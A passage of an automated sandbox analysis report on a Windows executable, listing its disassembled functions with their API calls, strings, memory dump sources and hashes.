                                                              • Opcode ID: ba2c28f028daf0640bd5a53d4a77a62ac3816600eb0ade2d7a7fa4741a67770a
                                                              • Instruction ID: c46cb0f8925f057466e41cbdf3336f72b89b471aa063439caa562b20a32156ab
                                                              • Opcode Fuzzy Hash: ba2c28f028daf0640bd5a53d4a77a62ac3816600eb0ade2d7a7fa4741a67770a
                                                              • Instruction Fuzzy Hash: AB113B32740254ABDB11DE34AC41BEF33D4AB06756F54407ABD49AB181C7BC9C85D3AC
                                                              Function 0041D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __fprintf_l.LIBCMT ref: 0041D954
                                                              • _strncpy.LIBCMT ref: 0041D99A
                                                                • Part of subcall function 00421DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00451030,00000200,0041D928,00000000,?,00000050,00451030), ref: 00421DC4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                              • String ID: $%s$@%s
                                                              • API String ID: 562999700-834177443
                                                              • Opcode ID: d242180e6719c93633fa7382eeab3365078665b5ab2df2f0b5fbd9919055f17e
                                                              • Instruction ID: 22f3819109cd410b5ece1b9d6a4934f23cc1d4b79effc868867a75adc694397c
                                                              • Opcode Fuzzy Hash: d242180e6719c93633fa7382eeab3365078665b5ab2df2f0b5fbd9919055f17e
                                                              • Instruction Fuzzy Hash: 4121D2B2950248AFEF20EEA4CC01FDE3BE8AF05704F104017F910962A2E779D688CB59
                                                              Function 00420E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0041AC5A,00000008,?,00000000,?,0041D22D,?,00000000), ref: 00420E85
                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0041AC5A,00000008,?,00000000,?,0041D22D,?,00000000), ref: 00420E8F
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0041AC5A,00000008,?,00000000,?,0041D22D,?,00000000), ref: 00420E9F
                                                              Strings
                                                              • Thread pool initialization failed., xrefs: 00420EB7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                              • String ID: Thread pool initialization failed.
                                                              • API String ID: 3340455307-2182114853
                                                              • Opcode ID: 615b2244293d822313b0a554a36c3024466e9020b3ff14452b0f934a6d87e29d
                                                              • Instruction ID: 0a1b0417a155426d21412b07281eb364a0bc7c214adc0f5303a8fd8962fd0304
                                                              • Opcode Fuzzy Hash: 615b2244293d822313b0a554a36c3024466e9020b3ff14452b0f934a6d87e29d
                                                              • Instruction Fuzzy Hash: E711C1B17007189FC3304F6AAC84AA7FBECEB65B45F51482FF1DAC3201D6B599808B58
                                                              Function 0041124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Malloc
                                                              • String ID: (B$2B$A
                                                              • API String ID: 2696272793-3227996866
                                                              • Opcode ID: 6fd4404277cf0d4d77d8709583fc990d0ac7f8b9ef5ddca7e50c68ae69a6d4de
                                                              • Instruction ID: 52b0296a6f9f1319b244e20bae6b7249120524359978e458d523043165ddc764
                                                              • Opcode Fuzzy Hash: 6fd4404277cf0d4d77d8709583fc990d0ac7f8b9ef5ddca7e50c68ae69a6d4de
                                                              • Instruction Fuzzy Hash: 4101DB75901229AFCB14DFA4D844ADEBBF8BF09314B10416AE909E3350D7749A81DF99
                                                              Function 0042DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                              • API String ID: 0-56093855
                                                              • Opcode ID: aaa1bb876cc6de7c9b6375833b1e388567c1a150c188500b0df18d1002afeb20
                                                              • Instruction ID: 09ea68559a725b8564bf2c7afbf5bbda5c8cbf62b88c8e32a86f799ee53249ba
                                                              • Opcode Fuzzy Hash: aaa1bb876cc6de7c9b6375833b1e388567c1a150c188500b0df18d1002afeb20
                                                              • Instruction Fuzzy Hash: F3019239B14365AFD7104F55FC44A5B3BA4F709356B50043BF80593232DA35D850DBAD
                                                              Function 00411316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041E2E8: _swprintf.LIBCMT ref: 0041E30E
                                                                • Part of subcall function 0041E2E8: _strlen.LIBCMT ref: 0041E32F
                                                                • Part of subcall function 0041E2E8: SetDlgItemTextW.USER32(?,0044E274,?), ref: 0041E38F
                                                                • Part of subcall function 0041E2E8: GetWindowRect.USER32(?,?), ref: 0041E3C9
                                                                • Part of subcall function 0041E2E8: GetClientRect.USER32(?,?), ref: 0041E3D5
                                                              • GetDlgItem.USER32(00000000,00003021), ref: 0041135A
                                                              • SetWindowTextW.USER32(00000000,004435F4), ref: 00411370
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                              • String ID: B$0
                                                              • API String ID: 2622349952-128886849
                                                              • Opcode ID: 5a01af81513b62141b56b416c099b8b40ea5a449f76cd5635dfe764ca159aaed
                                                              • Instruction ID: ffbe6b4eed60da675946b174672f398cd752ecb36ad79e29f3322e43388322e1
                                                              • Opcode Fuzzy Hash: 5a01af81513b62141b56b416c099b8b40ea5a449f76cd5635dfe764ca159aaed
                                                              • Instruction Fuzzy Hash: 57F0A43014428CA6EF150F518C0D7EB3B58AF00345F048226FE5851AF9CB7CC9D4EA18
                                                              Function 00439A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID:
                                                              • API String ID: 1036877536-0
                                                              • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                              • Instruction ID: f1ab994af2a7f1595908513fae28402a6722882c3ca1d1b943708f84ab513aa7
                                                              • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                              • Instruction Fuzzy Hash: A3A14672A042869FEB25CF18C8817AFBBE5EF59310F18616FE4859B381C2BC9D41C758
                                                              Function 0041A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00417F69,?,?,?), ref: 0041A3FA
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00417F69,?), ref: 0041A43E
                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00417F69,?,?,?,?,?,?,?), ref: 0041A4BF
                                                              • CloseHandle.KERNEL32(?,?,?,00000800,?,00417F69,?,?,?,?,?,?,?,?,?,?), ref: 0041A4C6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: File$Create$CloseHandleTime
                                                              • String ID:
                                                              • API String ID: 2287278272-0
                                                              • Opcode ID: 7468e3ba6882cdfe3be7c599abb9f7077304fbf0c2bf46376d9b7aa91c5716ae
                                                              • Instruction ID: 34f39c3482cb2e4a5c15f9bf2130df267fdda69177e5b3157961b24e987aa517
                                                              • Opcode Fuzzy Hash: 7468e3ba6882cdfe3be7c599abb9f7077304fbf0c2bf46376d9b7aa91c5716ae
                                                              • Instruction Fuzzy Hash: 9E41CF312493859AE721DF24DC45BEFBBE49B81704F04091EF9E093290D6A89A989B57
                                                              Function 0043C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,004391E0,?,00000000,?,00000001,?,?,00000001,004391E0,?), ref: 0043C9D5
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043CA5E
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00436CBE,?), ref: 0043CA70
                                                              • __freea.LIBCMT ref: 0043CA79
                                                                • Part of subcall function 00438E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0043CA2C,00000000,?,00436CBE,?,00000008,?,004391E0,?,?,?), ref: 00438E38
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: acce325d4b32ef68472ad23d0c9bcd8bac26bf27380434060c27194e5b50cab9
                                                              • Instruction ID: 1653167462d7997f3fd6d4bc594135a3ab52970c5c59c21e687cc6a265d605b8
                                                              • Opcode Fuzzy Hash: acce325d4b32ef68472ad23d0c9bcd8bac26bf27380434060c27194e5b50cab9
                                                              • Instruction Fuzzy Hash: 3E31D072A0021AABDF24DF65DC81EAF7BA5EB49710F04426AFC04E6250E739DD50CB94
                                                              Function 0042A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0042A666
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0042A675
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0042A683
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0042A691
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: CapsDevice$Release
                                                              • String ID:
                                                              • API String ID: 1035833867-0
                                                              • Opcode ID: d8b53de92bb0f4b8b44b4cae2fed65d9ad0368da1ae2d5ac2e3c1bc452cc40dc
                                                              • Instruction ID: ee9b809c2b38b31f27f09b7259fa7fa83bb88921be775362ae42fa0c097a0fc1
                                                              • Opcode Fuzzy Hash: d8b53de92bb0f4b8b44b4cae2fed65d9ad0368da1ae2d5ac2e3c1bc452cc40dc
                                                              • Instruction Fuzzy Hash: ABE08C31942762A7C2205F60BC0DB8B3E14AB06B53F004121FA09A6195EF6486808BE8
                                                              Function 0042D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcschr
                                                              • String ID: .lnk$dB
                                                              • API String ID: 2691759472-1035013524
                                                              • Opcode ID: 986298ac30bfc19ee90b12e38fcfa2fc1f50412ab805c149ae403ab252eed3b7
                                                              • Instruction ID: 82791aa2cc25aabd4f707ebf6347b93cbfd740d13c2cfa205f94ff0dc836c188
                                                              • Opcode Fuzzy Hash: 986298ac30bfc19ee90b12e38fcfa2fc1f50412ab805c149ae403ab252eed3b7
                                                              • Instruction Fuzzy Hash: 4DA13E72E002399ADF24DBA0DD45EFB73FCAF44304F4485E7A509E3141EE789A858B69
                                                              Function 0043B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 0043B324
                                                                • Part of subcall function 00439097: IsProcessorFeaturePresent.KERNEL32(00000017,00439086,00000050,00443A34,?,0041D710,00000004,00451030,?,?,00439093,00000000,00000000,00000000,00000000,00000000), ref: 00439099
                                                                • Part of subcall function 00439097: GetCurrentProcess.KERNEL32(C0000417,00443A34,00000050,00451030), ref: 004390BB
                                                                • Part of subcall function 00439097: TerminateProcess.KERNEL32(00000000), ref: 004390C2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                              • String ID: *?$.
                                                              • API String ID: 2667617558-3972193922
                                                              • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                              • Instruction ID: 9243d94cc373f138efb00c256caaec28cf729623235328c84edcc871727b7197
                                                              • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                              • Instruction Fuzzy Hash: 9751C371E002199FDF14CFA9C881AAEB7B5EF4C314F2451AEE954E7340E7399E018B94
                                                              Function 004175DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 004175E3
                                                                • Part of subcall function 004205DA: _wcslen.LIBCMT ref: 004205E0
                                                                • Part of subcall function 0041A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0041A598
                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0041777F
                                                                • Part of subcall function 0041A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0041A325,?,?,?,0041A175,?,00000001,00000000,?,?), ref: 0041A501
                                                                • Part of subcall function 0041A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0041A325,?,?,?,0041A175,?,00000001,00000000,?,?), ref: 0041A532
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                              • String ID: :
                                                              • API String ID: 3226429890-336475711
                                                              • Opcode ID: b8d89e58a9e8b24ed3999e1ab3c6097e68a786ecaec233b8c8aa87a83dc7ea6c
                                                              • Instruction ID: fc538012f4ebe5e0518a8b4285b53734e728bdf22456af26a0973b8882451e00
                                                              • Opcode Fuzzy Hash: b8d89e58a9e8b24ed3999e1ab3c6097e68a786ecaec233b8c8aa87a83dc7ea6c
                                                              • Instruction Fuzzy Hash: 1841B071900118AAEB20EB61CC55EEEB37DAF41304F0040DBB609A2192DB785FC9CB78
                                                              Function 0041B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcschr
                                                              • String ID: *
                                                              • API String ID: 2691759472-163128923
                                                              • Opcode ID: 8a8cace6bc1c90515ae4a81a4bcaf2ddb462bac325b9c8a281f2928d7a247daa
                                                              • Instruction ID: 57ad4a4436ae089ca1ddfe77b1a8cb8a713a734b03f53afe686d058490450a1f
                                                              • Opcode Fuzzy Hash: 8a8cace6bc1c90515ae4a81a4bcaf2ddb462bac325b9c8a281f2928d7a247daa
                                                              • Instruction Fuzzy Hash: BC3114322043119A9B30AE558A026FB73E4DF94B14F15C11FFD8847283E76E8CC292EE
                                                              Function 0042B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: }
                                                              • API String ID: 176396367-4239843852
                                                              • Opcode ID: 174bc937f5f7b48cbfc57a74af13c8e05c3d2a9b5c08f05d17ae4eff4facd865
                                                              • Instruction ID: 9c1bbcc49e8a618d219ca06a4ad567b47104ddb663fd8389e84b987863f263e3
                                                              • Opcode Fuzzy Hash: 174bc937f5f7b48cbfc57a74af13c8e05c3d2a9b5c08f05d17ae4eff4facd865
                                                              • Instruction Fuzzy Hash: 6021C572A043266AD731EA65E845B6BB3DCDF44758F84042FF640C7241EB6C9D8883EA
                                                              Function 0041F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0041F2E4
                                                                • Part of subcall function 0041F2C5: GetProcAddress.KERNEL32(004581C8,CryptUnprotectMemory), ref: 0041F2F4
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,0041F33E), ref: 0041F3D2
                                                              Strings
                                                              • CryptUnprotectMemory failed, xrefs: 0041F3CA
                                                              • CryptProtectMemory failed, xrefs: 0041F389
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
